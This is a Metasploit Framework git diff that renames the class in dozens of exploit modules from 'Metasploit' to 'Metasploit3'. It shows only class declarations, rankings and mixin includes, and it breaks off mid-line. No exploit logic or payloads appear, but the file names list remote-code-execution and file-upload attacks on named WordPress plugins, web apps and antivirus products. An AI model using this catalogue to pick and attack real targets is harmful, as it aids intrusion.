Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index e76f98f19a..c371316749 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index eecfff14d2..95ed12f2fe 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index b5be678fc0..373ad569cc 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 0adb3fc0b6..45c8bbe1cf 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 31be728993..1579b33cc9 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 74ce604dd9..5817ebf9d4 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index c8c7a22ffc..1ab30f176f 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index fb7e3204d0..008317ea7f 100644 --- a/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb index 56bff267ba..06b6f4b909 100644 --- a/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 86c69774f7..dc6b8ca785 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index a22120a2d2..f86704f106 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb index 1051cdd827..ced2ed7f8c 100644 --- a/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb +++ b/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb index 2141bf8a03..39b948f6d9 100644 --- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 5a3a61725b..10b9d39bbd 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index afe808253d..525d1dfce9 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index 377a09d3b0..f7e59f655a 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbmysql' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 4ce46a4946..26b36e5d62 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index 5014e957be..cacccd0f7d 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 7364c0433c..99deba5747 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index f666c8faeb..f807f9e58c 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 224f7b77db..485c58a950 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index 324432c0ce..2fc0fe33ca 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 86d364a719..cbc7e40b53 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index f815ba90cc..00226d4e6b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 75a6f808f7..2321cede00 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 66d0bfa925..3e83952a77 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 41402bafef..564aaead50 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index e00e0ae422..5e229750e1 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index c58b5bd600..830cb7cea6 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index 97f22cd70c..6b7a2c30b9 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index e503dec2e8..bcf6911d2b 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index ecddf6bb84..ff0f1b3644 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index 847e8264a4..f4cd2947c3 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index b8bd7ad5e0..b9077a1de7 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index 2e87905569..e12dd578c5 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index f28c89a489..1a4f6f9ab5 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index f3e2c9315c..6af43f873a 100644 --- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index e25b11491e..0cb88957e1 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index f882efcdd6..8f26104b4e 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index f96bfc248b..fa69d395d3 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/x11/x11_keyboard_exec.rb b/modules/exploits/unix/x11/x11_keyboard_exec.rb index 612c0b1995..00ba8cad4b 100644 --- a/modules/exploits/unix/x11/x11_keyboard_exec.rb +++ b/modules/exploits/unix/x11/x11_keyboard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb index 9166e0bda0..efed29d6fa 100644 --- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb +++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb index df8e63e783..7088c01e04 100644 --- a/modules/exploits/windows/antivirus/ams_xfr.rb +++ b/modules/exploits/windows/antivirus/ams_xfr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb index a74d120f22..376be876bb 100644 --- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb +++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/windows/antivirus/symantec_iao.rb b/modules/exploits/windows/antivirus/symantec_iao.rb index 3a33e4fdac..48b9a23fb3 100644 --- a/modules/exploits/windows/antivirus/symantec_iao.rb +++ b/modules/exploits/windows/antivirus/symantec_iao.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_rtvscan.rb b/modules/exploits/windows/antivirus/symantec_rtvscan.rb index 997428c9a0..d766eb6294 100644 --- a/modules/exploits/windows/antivirus/symantec_rtvscan.rb +++ b/modules/exploits/windows/antivirus/symantec_rtvscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 039c62f8d4..5822a09417 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb index 68d8d930cd..96d629dcf2 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb index 10a13c45eb..026513e734 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_createbinding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb index d09010ab74..ef09da8928 100644 --- a/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb +++ b/modules/exploits/windows/antivirus/trendmicro_serverprotect_earthagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/arkeia/type77.rb b/modules/exploits/windows/arkeia/type77.rb index 4a698064e1..d1c08fd8c3 100644 --- a/modules/exploits/windows/arkeia/type77.rb +++ b/modules/exploits/windows/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index 02e6225907..a6eb07f123 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb index 582a75bf77..8670ef8c98 100644 --- a/modules/exploits/windows/backupexec/name_service.rb +++ b/modules/exploits/windows/backupexec/name_service.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/backupexec/remote_agent.rb b/modules/exploits/windows/backupexec/remote_agent.rb index 41e2779344..13431a8ea1 100644 --- a/modules/exploits/windows/backupexec/remote_agent.rb +++ b/modules/exploits/windows/backupexec/remote_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::NDMP diff --git a/modules/exploits/windows/brightstor/ca_arcserve_342.rb b/modules/exploits/windows/brightstor/ca_arcserve_342.rb index 0f1528d5b8..0ac6087379 100644 --- a/modules/exploits/windows/brightstor/ca_arcserve_342.rb +++ b/modules/exploits/windows/brightstor/ca_arcserve_342.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb index 4072989392..8145935ad9 100644 --- a/modules/exploits/windows/brightstor/discovery_tcp.rb +++ b/modules/exploits/windows/brightstor/discovery_tcp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/discovery_udp.rb b/modules/exploits/windows/brightstor/discovery_udp.rb index 5a0796278b..bfe484f24f 100644 --- a/modules/exploits/windows/brightstor/discovery_udp.rb +++ b/modules/exploits/windows/brightstor/discovery_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/etrust_itm_alert.rb b/modules/exploits/windows/brightstor/etrust_itm_alert.rb index c3fa9c5dc1..61ae466927 100644 --- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb +++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/hsmserver.rb b/modules/exploits/windows/brightstor/hsmserver.rb index f3cf15b197..ade7cf8ecf 100644 --- a/modules/exploits/windows/brightstor/hsmserver.rb +++ b/modules/exploits/windows/brightstor/hsmserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index 33c609cce3..d439f85cc8 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb 